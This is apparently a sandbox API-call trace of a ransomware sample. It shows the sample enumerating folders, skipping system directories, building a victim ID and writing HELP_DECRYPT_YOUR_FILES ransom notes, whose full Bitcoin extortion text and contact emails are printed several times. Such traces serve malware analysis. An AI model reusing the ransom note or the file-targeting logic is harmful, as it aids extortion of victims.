	[0177.699] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\HELP_DECRYPT_YOUR_FILES.HTML") returned 76
	[0177.700] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0177.700] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.700] WriteFile (in: hFile=0xffffffff, lpBuffer=0x189b24, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0) returned 0
	[0177.700] CloseHandle (hObject=0xffffffff) returned 1
	[0177.700] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.701] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.701] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.701] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0177.702] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.702] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0177.702] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff
	[0177.702] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.702] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18a538, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0) returned 0
	[0177.703] CloseHandle (hObject=0xffffffff) returned 1
	[0177.703] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*.*" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.703] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*.*") returned 51
	[0177.703] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.703] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*") returned 0x33
	[0177.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.704] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="windows") returned 0x0
	[0177.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.704] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="boot") returned 0x0
	[0177.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.704] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="system volume information") returned 0x0
	[0177.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.704] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="temp") returned 0x0
	[0177.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="program files") returned 0x0
	[0177.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="appdata") returned 0x0
	[0177.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="application data") returned 0x0
	[0177.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="winnt") returned 0x0
	[0177.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="tmp") returned 0x0
	[0177.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="cache") returned 0x0
	[0177.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="webcache") returned 0x0
	[0177.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="inetcache") returned 0x0
	[0177.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="nvidia") returned 0x0
	[0177.708] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.708] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="packages") returned 0x0
	[0177.708] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.708] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="cookies") returned 0x0
	[0177.708] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.708] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="programdata") returned 0x0
	[0177.708] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0177.708] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0177.709] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.709] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0177.709] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0177.709] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.709] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0177.710] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x836e9136, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x836e9136, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x836e9136, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0177.710] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8369ceed, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8369ceed, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x836e9136, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0177.710] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1
	[0177.710] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1
	[0177.710] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1
	[0177.710] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc"
	[0177.710] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\"
	[0177.710] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\", lpString2="Profiles" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles"
	[0177.710] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles"
	[0177.710] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\"
	[0177.711] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\"
	[0177.711] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*"
	[0177.711] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0177.711] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*") returned 49
	[0177.711] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.712] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*") returned 0x31
	[0177.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="windows") returned 0x0
	[0177.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="boot") returned 0x0
	[0177.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="system volume information") returned 0x0
	[0177.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.713] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.722] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="temp") returned 0x0
	[0177.722] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.722] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="program files") returned 0x0
	[0177.722] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.723] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.723] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.723] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="appdata") returned 0x0
	[0177.723] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.723] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="application data") returned 0x0
	[0177.723] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.723] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="winnt") returned 0x0
	[0177.723] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.724] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="tmp") returned 0x0
	[0177.724] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.724] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="cache") returned 0x0
	[0177.724] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.724] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.724] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.724] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="webcache") returned 0x0
	[0177.725] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.725] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="inetcache") returned 0x0
	[0177.725] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.725] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="nvidia") returned 0x0
	[0177.725] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.725] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="packages") returned 0x0
	[0177.725] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.725] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="cookies") returned 0x0
	[0177.726] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.726] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="programdata") returned 0x0
	[0177.726] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.726] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0177.726] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0177.726] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0177.727] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles"
	[0177.727] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*"
	[0177.727] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.727] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.727] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\HELP_DECRYPT_YOUR_FILES.TXT") returned 73
	[0177.727] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0177.728] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.728] WriteFile (in: hFile=0xffffffff, lpBuffer=0x189728, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0) returned 0
	[0177.728] CloseHandle (hObject=0xffffffff) returned 1
	[0177.728] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.729] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.730] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0177.731] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.731] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0177.731] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff
	[0177.731] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.731] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18a578, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0) returned 0
	[0177.731] CloseHandle (hObject=0xffffffff) returned 1
	[0177.731] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.732] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.732] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.732] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\HELP_DECRYPT_YOUR_FILES.HTML") returned 74
	[0177.732] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0177.732] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR 